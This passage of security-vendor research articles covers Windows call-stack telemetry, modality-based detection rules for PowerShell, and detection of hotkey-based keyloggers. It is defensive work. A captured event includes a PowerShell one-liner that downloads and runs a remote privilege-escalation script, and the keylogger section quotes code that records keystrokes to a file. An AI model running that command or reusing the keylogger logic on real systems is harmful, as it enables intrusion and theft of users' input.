      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x1bac8" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlAnsiStringToUnicodeString+0x3cb" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitShimEngineDynamic+0x394d" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x1db" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x63" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0xe" }
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false } ],
      "name": "file.exe",
      "hash": { "sha256": "a59a7b56f695845ce185ddc5210bcabce1fff909bac3842c2fb325c60db15df7" }
    }
  }
}

Pre-entrypoint execution example

The next pair is KiUserExceptionDispatcher and KiRaiseUserExceptionDispatcher. The kernel uses the former to pass execution to a registered user-mode structured exception handler after a user-mode exception condition has occurred. The latter also raises an exception, but on behalf of the kernel instead. This second variant is usually only caught by debuggers, including Application Verifier, and helps identify when user-mode code is not sufficiently checking return codes from syscalls. These functions will usually be seen in call stacks related to application-specific crash handling or Windows Error Reporting. However, sometimes malware will use it as a pseudo-breakpoint — for example, if they want to fluctuate memory protections to rehide their shellcode immediately after making a system call.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll|file.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      {
        "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14",
        "protection_provenance": "file.exe", /* another vendor's hooks were unhooked */
        "allocation_private_bytes": 8192
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0xd99c" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlInitializeCriticalSectionAndSpinCount+0x1c6" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlWalkFrameChain+0x1119" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserExceptionDispatcher+0x2e" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x12612" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "file.exe",
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false }],
      "hash":   { "sha256": "0e5a62c0bd9f4596501032700bb528646d6810b16d785498f23ef81c18683c74" }
    }
  }
}

Protection fluctuation via exception handler example

Next is KiUserApcDispatcher, which is used to deliver user APCs. These are one of the favourite tools of malware authors, as Microsoft only provides limited visibility into its use.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|cronos.exe",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x36" }, /* tail call */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserApcDispatcher+0x2e" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwDelayExecution+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SleepEx+0x9e" },
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x107d",
        "allocation_private_bytes": 147456, /* stomped */
        "protection": "RW-", /* fluctuation */
        "protection_provenance": "Undetermined", /* proxied call */
        "callsite_leading_bytes": "010000004152524c8d520141524883ec284150415141baffffffff41525141ba010000004152524c8d520141524883ec284150b9ffffffffba0100000041ffe1",
        "callsite_trailing_bytes": "4883c428c3cccccccccccccccccccccccccccc894c240857b820190000e8a10c0000482be0488b052fd101004833c44889842410190000488d84243014000048"
      }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe"
    }
  }
}

Protection fluctuation via APC example

The Windows window manager is implemented in a kernel-mode device driver (win32k.sys). Mostly. Sometimes the window manager needs to do something from user-mode, and KiUserCallbackDispatcher is the mechanism to achieve that. It’s basically a reverse syscall that targets user32.dll functions. Overwriting an entry in a process’s KernelCallbackTable is an easy way to hijack a GUI thread, so any other module following this call is suspicious.

Knowledge of the purpose of each of these kernel-mode to user-mode entry points greatly assists in determining if a given call stack is natural or if it has been misappropriated to achieve alternative goals.

Making call stacks understandable

To aid understandability, we also tag the event with various process.Ext.api.behaviors that we identify. These behaviours aren’t necessarily malicious, but they highlight aspects that are relevant to alert triage or threat hunting. For call stacks, these include:

native_api	A call was made directly to the Native API rather than the Win32 API.
direct_syscall	A syscall instruction originated outside of the Native API layer.
proxy_call	The call stack may indicate a proxied API call to mask the true source.
shellcode	Second generation executable non-image memory called a sensitive API.
image_indirect_call	An entry in the call stack was preceded by a call to a dynamically resolved function.
image_rop	No call instruction preceded an entry in the call stack.
image_rwx	An entry in the call stack is writable. Code should be read-only.
unbacked_rwx	An entry in the call stack is non-image and writable. Even JIT code should be read-only.
truncated_stack	The call stack seems to be unexpectedly truncated. This may be due to malicious tampering.

In some contexts, these behaviours alone may be sufficient to detect malware.

Spoofing — bypass or liability?

Return address spoofing has been a staple game hacking and malware technique for many, many years. This simple trick allows injected code to borrow the reputation of a legitimate module with few consequences. The goal of deep call stack inspection and behaviour baselines is to stop giving malware this free pass.

Offensive researchers have been assisting this effort by looking into approaches for full call stack spoofing. Most notably:

Spoofing Call Stacks To Confuse EDRs by William Burgess
SilentMoonwalk: Implementing a dynamic Call Stack Spoofer by Alessandro Magnosi, Arash Parsa and Athanasios Tserpelis

SilentMoonwalk, in addition to being superb offensive research, is an excellent example of how lying can get you into twice the amount of trouble — but only if you get caught. Many Defense Evasion techniques rely on security-by-obscurity — and once exposed by researchers, they can become a liability. In this case, the research included advice on the detection opportunities introduced by the evasion attempt.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAlloc+0x48" },
      {
        "symbol_info": "c:\\windows\\system32\\kernelbase.dll!CreatePrivateObjectSecurity+0x31",
        /* 4883c438 stack desync gadget - add rsp 0x38 */
        "callsite_trailing_bytes": "4883c438c3cccccccccccccccccccc48895c241057498bd8448bd2488bf94885c90f84660609004885db0f845d060900418bd14585c97411418bc14803c383ea",
        "callsite_leading_bytes": "cccccccccccccccccccccccccccccc4883ec38488b4424684889442428488b442460488944242048ff15d9b21b000f1f44000085c00f8830300900b801000000"
      },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!Internal_EnumSystemLocales+0x406" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SystemTimeToTzSpecificLocalTimeEx+0x2d1" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!WaitForMultipleObjectsEx+0x982" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined", /* gadget module resulted in suspicious call stack */
      "reason": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll"
    }
  }
}

SilentMoonwalk call stack example

A standard technique for unearthing hidden artifacts is to enumerate them using multiple techniques and compare the results for discrepancies. This is how RootkitRevealer works. This approach was also used in Get-InjectedThreadEx.exe, which climbs up the thread stack as well as walking down it.

In certain circumstances, we may be able to recover a call stack in two ways. If there are discrepancies, then you will see the less reliable call stack emitted as call_stack_summary_original.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll",
    "call_stack_summary_original": "ntdll.dll|kernelbase.dll|version.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtContinue+0x12" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x13" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll"
    }
  }
}

Call Stack summary original example

Call Stacks are for everyone

By default you will only find call stacks in our alerts, but this is configurable through advanced policy.

events.callstacks.emit_in_events	If set, call stacks will be included in regular events where they are collected. Otherwise, they are only included in events that trigger behavioral protection rules. Note that setting this may significantly increase data volumes. Default: false

Further insights into Windows call stacks is available in the following Elastic Security Labs articles:

Misbehaving Modalities: Detecting Tools, Not Techniques

Thu, 15 May 2025 00:00:00 GMT

What is Execution Modality?

Jared Atkinson, Chief Strategist at SpecterOps and prolific writer on security strategy, recently introduced the very useful concept of Execution Modality to help us reason about malware techniques, and how to robustly detect them. In short, Execution Modality describes how a malicious behaviour is executed, rather than simply defining what the behaviour does.

For example, the behaviour of interest might be Windows service creation, and the modality might be either a system utility (such as `sc.exe`), a PowerShell script, or shellcode that uses indirect syscalls to directly write to the service configuration in the Windows Registry.

Atkinson outlined that if your goal is to detect a specific technique, you want to ensure that your collection is as close as possible to the operating system’s source of truth and eliminate any modality assumptions.

Case Study: service creation modalities

In the typical Service creation scenario within the Windows OS, an installer calls sc.exe create which makes an RCreateService RPC call to an endpoint in the Service Control Manager (SCM, aka services.exe) which then makes syscalls to the kernel-mode configuration manager to update the database of installed services in the registry. This is later flushed to disk and restored from disk on boot.

This means that the source of truth for a running system is the registry (though hives are flushed to disk and can be tampered with offline).

In a threat hunting scenario, we could easily detect anomalous sc.exe command lines - but a different tool might make Service Control RPC calls directly.

If we were processing our threat data stringently, we could also detect anomalous Service Control RPC calls, but a different tool might make syscalls (in)directly or use another service, such as the Remote Registry, to update the service database indirectly.

In other words, some of these execution modalities bypass traditional telemetry such as Windows event logs.

So how do we monitor changes to the configuration manager? We can’t robustly monitor syscalls directly due to Kernel Patch Protection, but Microsoft has provided configuration manager callbacks as an alternative. This is where Elastic has focused our service creation detection efforts - as close to the operating system’s source of truth as possible.

The trade-off for this low-level visibility, however, is a potential reduction in context. For example, due to Windows architectural decisions, security vendors do not know which RPC client is requesting the creation of a registry key in the services database. Microsoft only supports querying RPC client details from a user-mode RPC service.

Starting with Windows 10 21H1, Microsoft began including RPC client details in the service creation event log. This event, while less robust, sometimes provides additional context that might assist in determining the source of an anomalous behaviour.

Due to their history of abuse, some modalities have been extended with extra logging - one important example is PowerShell. This allows certain techniques to be detected with high precision - but only when executed within PowerShell. It is important not to conflate having detection coverage of a technique in PowerShell with coverage of that technique in general. This nuance is important when estimating MITRE ATT&CK coverage. As red teams routinely demonstrate, having 100% technique coverage - but only for PowerShell - is close to 0% real-world coverage.

Summiting the Pyramid (STP) is a related analytic scoring methodology from MITRE. It makes a similar conclusion about the fragility of PowerShell scriptblock-based detections and assigns such rules a low robustness score.

High-level telemetry sources, such as Process Creation logging and PowerShell logging, are extremely brittle at detecting most techniques as they cover very few modalities. At best, they assist in detecting the most egregious Living off the Land (LotL) abuses.

Atkinson made the following astute observation in the example used to motivate the discussion:

An important point is that our higher-order objective in detection is behavior-based, not modality-based. Therefore, we should be interested in detecting Session Enumeration (behavior-focused), not Session Enumeration in PowerShell (modality-focused).

Sometimes that is only half of the story though. Sometimes detecting that the tool itself is out of context is more efficient than detecting the technique. Sometimes the execution modality itself is anomalous.

An alternative to detecting a known technique is to detect a misbehaving modality.

Call stacks divulge Modality

One of Elastic’s strengths is the inclusion of call stacks in the majority of our events. This level of call provenance detail greatly assists in determining whether a given activity is malicious or benign. Call stack summaries are often sufficient to divulge the execution modality - the runtimes for PowerShell, .NET, RPC, WMI, VBA, Lua, Python, and Java all leave traces in the call stack.

Some of our first call stack-based rules were for Office VBA macros (vbe7.dll) spawning child processes or dropping files, and for unbacked executable memory loading the .NET runtime. In both of these examples, the technique itself was largely benign; it was the modality of the behaviour that was predominantly anomalous.

So can we flip the typical behaviour-focused detection approach to a modality-focused one? For example, can we detect solely on the use of any dual-purpose API call originating from PowerShell?

Using call stacks, Elastic is able to differentiate between the API calls that originate from PowerShell scripts and those that come from the PowerShell or .NET runtimes.

Using Threat-Intelligence ETW as an approximation for a dual-purpose API, our rule for “Suspicious API Call from a PowerShell Script” was quite effective.

api where
event.provider == "Microsoft-Windows-Threat-Intelligence" and
process.name in~ ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and

/* PowerShell Script JIT - and incidental .NET assemblies */
process.thread.Ext.call_stack_final_user_module.name == "Unbacked" and
process.thread.Ext.call_stack_final_user_module.protection_provenance in ("clr.dll", "mscorwks.dll", "coreclr.dll") and

/* filesystem enumeration activity */
not process.Ext.api.summary like "IoCreateDevice( \\FileSystem\\*, (null) )" and

/* exclude nop operations */
not (process.Ext.api.name == "VirtualProtect" and process.Ext.api.parameters.protection == "RWX" and process.Ext.api.parameters.protection_old == "RWX") and

/* Citrix GPO Scripts */
not (process.parent.executable : "C:\\Windows\\System32\\gpscript.exe" and
  process.Ext.api.summary in ("VirtualProtect( Unbacked, 0x10, RWX, RW- )", "WriteProcessMemory( Self, Unbacked, 0x10 )", "WriteProcessMemory( Self, Data, 0x10 )")) and

/* cybersecurity tools */
not (process.Ext.api.name == "VirtualAlloc" and process.parent.executable : ("C:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe", "C:\\Program Files\\Velociraptor\\Velociraptor.exe")) and

/* module listing */
not (process.Ext.api.name in ("EnumProcessModules", "GetModuleInformation", "K32GetModuleBaseNameW", "K32GetModuleFileNameExW") and
  process.parent.executable : ("*\\Lenovo\\*\\BGHelper.exe", "*\\Octopus\\*\\Calamari.exe")) and

/* WPM triggers multiple times at process creation */
not (process.Ext.api.name == "WriteProcessMemory" and
     process.Ext.api.metadata.target_address_name in ("PEB", "PEB32", "ProcessStartupInfo", "Data") and
     _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info like ("?:\\windows\\*\\kernelbase.dll!CreateProcess*", "Unknown")))

Even though we don’t need to use the brittle PowerShell AMSI logging for detection, we can still provide this detail in the event as context as it assists with triage. This modality-based approach even detects common PowerShell defence evasion tradecraft such as:

ntdll unhooking
AMSI patching
user-mode ETW patching

{
 "event": {
  "provider": "Microsoft-Windows-Threat-Intelligence",
  "created": "2025-01-29T18:27:09.4386902Z",
  "kind": "event",
  "category": "api",
  "type": "change",
  "outcome": "unknown"
 },
 "message": "Endpoint API event - VirtualProtect",
 "process": {
  "parent": {
   "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
  },
  "name": "powershell.exe",
  "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "code_signature": {
   "trusted": true,
   "subject_name": "Microsoft Windows",
   "exists": true,
   "status": "trusted"
  },
  "command_line": "\"powershell.exe\" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
  "pid": 21908,
  "Ext": {
   "api": {
    "summary": "VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )",
    "metadata": {
     "target_address_path": "c:\\windows\\system32\\kernel32.dll",
     "amsi_logs": [
      {
       "entries": [
        "& {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "{iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "function Get-WinLogonTokenSystem\n{\nfunction _10001011000101101\n{\n  [CmdletBinding()]\n  Param(\n [Parameter(Position = 0, Mandatory = $true)]\n [ValidateNotNullOrEmpty()]\n [Byte[]]\n ${_00110111011010011},\n ...",
        "{[Char] $_}",
        "{\n [CmdletBinding()]\n Param(\n   [Parameter(Position = 0, Mandatory = $true)]\n   [Byte[]]\n   ${_00110111011010011},\n   [Parameter(Position = 1, Mandatory = $true)]\n   [String]\n   ${_10100110010101100},\n ...",
        "{ $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }"
       ],
       "type": "PowerShell"
      }
     ],
     "target_address_name": "kernel32.dll!FatalExit",
     "amsi_filenames": [
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1",
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1"
     ]
    },
    "behaviors": [
     "sensitive_api",
     "hollow_image",
     "unbacked_rwx"
    ],
    "name": "VirtualProtect",
    "parameters": {
     "address": 140727652261072,
     "size": 33,
     "protection_old": "R-X",
     "protection": "RWX"
    }
   },
   "code_signature": [
    {
     "trusted": true,
     "subject_name": "Microsoft Windows",
     "exists": true,
     "status": "trusted"
    }
   ],
   "token": {
    "integrity_level_name": "high"
   }
  },
  "thread": {
   "Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|Unbacked",
    "call_stack_contains_unbacked": true,
    "call_stack": [
     {
      "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14"
     },
     {
      "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b"
     },
     {
      "symbol_info": "Unbacked+0x3b5c",
      "protection_provenance": "clr.dll",
      "callsite_trailing_bytes": "41c644240c01833dab99f35f007406ff15b7b6f25f8bf0e85883755f85f60f95c00fb6c00fb6c041c644240c01488b55884989542410488d65c85b5e5f415c41",
      "protection": "RWX",
      "callsite_leading_bytes": "df765f4d63f64c897dc0488d55b8488bcee8ee6da95f4d8bcf488bcf488bd34d8bc64533db4c8b55b84c8955904c8d150c0000004c8955a841c644240c00ffd0"
     }
    ],
    "call_stack_final_user_module": {
     "code_signature": [
      {
       "trusted": true,
       "subject_name": "Microsoft Corporation",
       "exists": true,
       "status": "trusted"
      }
     ],
     "protection_provenance_path": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll",
     "name": "Unbacked",
     "protection_provenance": "clr.dll",
     "protection": "RWX",
     "hash": {
      "sha256": "707564fc98c58247d088183731c2e5a0f51923c6d9a94646b0f2158eb5704df4"
     }
    }
   },
   "id": 17260
  }
 },
 "user": {
  "id": "S-1-5-21-47396387-2833971351-1621354421-500"
 }
}

Robustness assessment

Using the Summiting the Pyramid analytic scoring methodology we can compare our PowerShell modality-based detection rule with traditional PowerShell

	Application (A)	Kernel mode (K)
Core to (Sub) Technique (5)		[ best ] Kernel ETW-based PowerShell modality detections
Core to Part of (Sub-) Technique (4)
Core to Pre-Existing Tool (3)
Core to Adversary-brought Tool (2)	AMSI and ScriptBlock-based PowerShell content detections
Ephemeral (1)	[ worst ]

PowerShell Analytic Scoring using Summiting the Pyramid

As noted earlier, most PowerShell detections receive a low 2A robustness score using the STP scale. This is in stark contrast to our PowerShell misbehaving modality rule which receives the highest possible 5K score (where appropriate kernel telemetry is available from Microsoft).

One caveat is that an STP analytic score does not yet include any measure for the setup and maintenance costs of a rule. This could potentially be approximated by the size of the known false positive software list for a given rule - though most open rule sets typically do not include this information. We do and, in our rule’s case, the false positives observed to date have been extremely manageable.

Can call stacks be spoofed though?

Yes - and slightly no. Our call stacks are all collected inline in the kernel, but the user-mode call stack itself resides in user-mode memory that the malware may control. This means that, if malware has achieved arbitrary execution, then it can control the stack frames that we see.

Sure, dual-purpose API calls from private memory are suspicious, but sometimes trying to hide your private memory is even more suspicious. This can take the form of:

Calls from overwritten modules.
Return addresses without a preceding call instruction.
Calls proxied via other modules.

Call stack control alone may not be enough. In order to truly bypass some of our call stack detections, an attacker must craft a call stack that entirely blends with normal activity. In some environments this can be baselined by security teams with high accuracy; making it hard for the attackers to remain undetected. Based on our in-house research, and with the assistance of red team tool developers, we are also continually improving our out-of-the-box detections.

Finally, on modern CPUs there are also numerous execution trace mechanisms that can be used to detect stack spoofing - such as Intel LBR, Intel BTS, Intel AET, Intel IPT, x64 CET and x64 Architectural LBR. Elastic already takes advantage of some of these hardware features, we have suggested to Microsoft that they may also wish to do so in further scenarios outside of exploit protection, and we are investigating further enhancements ourselves. Stay tuned.

Conclusion

Execution Modality is a new lens through which we can seek to understand attacker tradecraft.

Detecting specific techniques for individual modalities is not a cost-effective approach though - there are simply too many techniques and too many modalities. Instead, we should focus our technique detections as close to the operating system source of truth as possible; being careful not to lose necessary activity context, or to introduce unmanageable false positives. This is why Elastic considers Kernel ETW to be superior to user-mode ntdll hooking - it is closer to the source of truth allowing more robust detections.

For modality-based detection approaches, the value becomes apparent when we baseline all expected low-level telemetry for a given modality - and trigger on any deviations.

Historically, attackers have been able to choose modality for convenience. It is more cost effective to write tools in C# or PowerShell than in C or assembly. If we can herd modality then we’ve imposed cost.

Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure

Tue, 04 Mar 2025 00:00:00 GMT

Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure

In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.

Introduction

In May 2024, Elastic Security Labs published an article highlighting new features added in Elastic Defend (starting with 8.12) to enhance the detection of keyloggers running on Windows. In that post, we covered four types of keyloggers commonly employed in cyberattacks — polling-based keyloggers, hooking-based keyloggers, keyloggers using the Raw Input Model, and keyloggers using DirectInput — and explained our detection methodology. In particular, we introduced a behavior-based detection method using the Microsoft-Windows-Win32k provider within Event Tracing for Windows (ETW).

Shortly after publication, we were honored to have our article noticed by Jonathan Bar Or, Principal Security Researcher at Microsoft. He provided invaluable feedback by pointing out the existence of hotkey-based keyloggers and even shared proof-of-concept (PoC) code with us. Leveraging his PoC code Hotkeyz as a starting point, this article presents one potential method for detecting hotkey-based keyloggers.

Overview of Hotkey-based Keyloggers

What Is a Hotkey?

Before delving into hotkey-based keyloggers, let’s first clarify what a hotkey is. A hotkey is a type of keyboard shortcut that directly invokes a specific function on a computer by pressing a single key or a combination of keys. For example, many Windows users press Alt + Tab to switch between tasks (or, in other words, windows). In this instance, Alt + Tab serves as a hotkey that directly triggers the task-switching function.

(Note: Although other types of keyboard shortcuts exist, this article focuses solely on hotkeys. Also, all information herein is based on Windows 10 version 22H2 OS Build 19045.5371 without virtualization based security. Please note that the internal data structures and behavior may differ in other versions of Windows.)

Abusing Custom Hotkey Registration Functionality

In addition to using the pre-configured hotkeys in Windows as shown in the previous example, you can also register your own custom hotkeys. There are various methods to do this, but one straightforward approach is to use the Windows API function RegisterHotKey, which allows a user to register a specific key as a hotkey. For instance, the following code snippet demonstrates how to use the RegisterHotKey API to register the A key (with a virtual-key code of 0x41) as a global hotkey:

/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);

After registering a hotkey, when the registered key is pressed, a WM_HOTKEY message is sent to the message queue of the window specified as the first argument to the RegisterHotKey API (or to the thread that registered the hotkey if NULL is used). The code below demonstrates a message loop that uses the GetMessage API to check for a WM_HOTKEY message in the message queue, and if one is received, it extracts the virtual-key code (in this case, 0x41) from the message.

MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout << "WM_HOTKEY received! Virtual-Key Code: 0x"
            << std::hex << vkCode << std::dec << std::endl;
    }
}

In other words, imagine you're writing something in a notepad application. If the A key is pressed, the character won't be treated as normal text input — it will be recognized as a global hotkey instead.

In this example, only the A key is registered as a hotkey. However, you can register multiple keys (like B, C, or D) as separate hotkeys at the same time. This means that any key (i.e., any virtual-key code) that can be registered with the RegisterHotKey API can potentially be hijacked as a global hotkey. A hotkey-based keylogger abuses this capability to capture the keystrokes entered by the user.

Based on our testing, we found that not only alphanumeric and basic symbol keys, but also those keys when combined with the SHIFT modifier, can all be registered as hotkeys using the RegisterHotKey API. This means that a keylogger can effectively monitor every keystroke necessary to steal sensitive information.

Capturing Keystrokes Stealthily

Let's walk through the actual process of how a hotkey-based keylogger captures keystrokes, using the Hotkeyz hotkey-based keylogger as an example.

In Hotkeyz, it first registers each alphanumeric virtual-key code — and some additional keys, such as VK_SPACE and VK_RETURN — as individual hotkeys by using the RegisterHotKey API.

Then, inside the keylogger's message loop, the PeekMessageW API is used to check whether any WM_HOTKEY messages from these registered hotkeys have appeared in the message queue. When a WM_HOTKEY message is detected, the virtual-key code it contains is extracted and eventually saved to a text file. Below is an excerpt from the message loop code, highlighting the most important parts.

while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) & 0xFFFF0000) >> 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L"RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).", cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &cCurrVk, sizeof(cCurrVk), &cbBytesWritten, NULL))
  {
....

One important detail is this: to avoid alerting the user to the keylogger's presence, once the virtual-key code is extracted from the message, the key's hotkey registration is temporarily removed using the UnregisterHotKey API. After that, the key press is simulated with keybd_event so that it appears to the user as if the key was pressed normally. Once the key press is simulated, the key is re-registered using the RegisterHotKey API to wait for further input. This is the core mechanism behind how a hotkey-based keylogger operates.

Detecting Hotkey-Based Keyloggers

Now that we understand what hotkey-based keyloggers are and how they operate, let's explain how to detect them.

ETW Does Not Monitor the RegisterHotKey API

Following the approach described in an earlier article, we first investigated whether Event Tracing for Windows (ETW) could be used to detect hotkey-based keyloggers. Our research quickly revealed that ETW currently does not monitor the RegisterHotKey or UnregisterHotKey APIs. In addition to reviewing the manifest file for the Microsoft-Windows-Win32k provider, we reverse-engineered the internals of the RegisterHotKey API — specifically, the NtUserRegisterHotKey function in win32kfull.sys. Unfortunately, we found no evidence that these APIs trigger any ETW events when executed.

The image below shows a comparison between the decompiled code for NtUserGetAsyncKeyState (which is monitored by ETW) and NtUserRegisterHotKey. Notice that at the beginning of NtUserGetAsyncKeyState, there is a call to EtwTraceGetAsyncKeyState — a function associated with logging ETW events — while NtUserRegisterHotKey does not contain such a call.

　
Although we also considered using ETW providers other than Microsoft-Windows-Win32k to indirectly monitor calls to the RegisterHotKey API, we found that the detection method using the "hotkey table" — which will be introduced next and does not rely on ETW — achieves results that are comparable to or even better than monitoring the RegisterHotKey API. In the end, we chose to implement this method.

Detection Using the Hotkey Table (gphkHashTable)

After discovering that ETW cannot directly monitor calls to the RegisterHotKey API, we started exploring detection methods that don't rely on ETW. During our investigation, we wondered, "Isn't the information for registered hotkeys stored somewhere? And if so, could that data be used for detection?" Based on that hypothesis, we quickly found a hash table labeled gphkHashTable within NtUserRegisterHotKey. Searching Microsoft's online documentation revealed no details on gphkHashTable, suggesting that it's an undocumented kernel data structure.

Through reverse engineering, we discovered that this hash table stores objects containing information about registered hotkeys. Each object holds details such as the virtual-key code and modifiers specified in the arguments to the RegisterHotKey API. The right side of Figure 3 shows part of the structure definition for a hotkey object (named HOT_KEY), while the left side displays how the registered hotkey objects appear when accessed via WinDbg.

We also determined that ghpkHashTable is structured as shown in Figure 4. Specifically, it uses the result of the modulo operation (with 0x80) on the virtual-key code (specified by the RegisterHotKey API) as the index into the hash table. Hotkey objects sharing the same index are linked together in a list, which allows the table to store and manage hotkey information even when the virtual-key codes are identical but the modifiers differ.

In other words, by scanning all HOT_KEY objects stored in ghpkHashTable, we can retrieve details about every registered hotkey. If we find that every main key — for example, each individual alphanumeric key — is registered as a separate hotkey, that strongly indicates the presence of an active hotkey-based keylogger.

Implementing the Detection Tool

Now, let's move on to implementing the detection tool. Since gphkHashTable resides in the kernel space, it cannot be accessed by a user-mode application. For this reason, it was necessary to develop a device driver for detection. More specifically, we decided to develop a device driver that obtains the address of gphkHashTable and scans through all the hotkey objects stored in the hash table. If the number of alphanumeric keys registered as hotkeys exceeds a predefined threshold, it will alert us to the potential presence of a hotkey-based keylogger.

How to Obtain the Address of gphkHashTable

While developing the detection tool, one of the first challenges we faced was how to obtain the address of gphkHashTable. After some consideration, we decided to extract the address directly from an instruction in the win32kfull.sys driver that accesses gphkHashTable.

Through reverse engineering, we discovered that within the IsHotKey function — right at the beginning — there is a lea instruction (lea rbx, gphkHashTable) that accesses gphkHashTable. We used the opcode byte sequence (0x48, 0x8d, 0x1d) from that instruction as a signature to locate the corresponding line, and then computed the address of gphkHashTable using the obtained 32-bit (4-byte) offset.

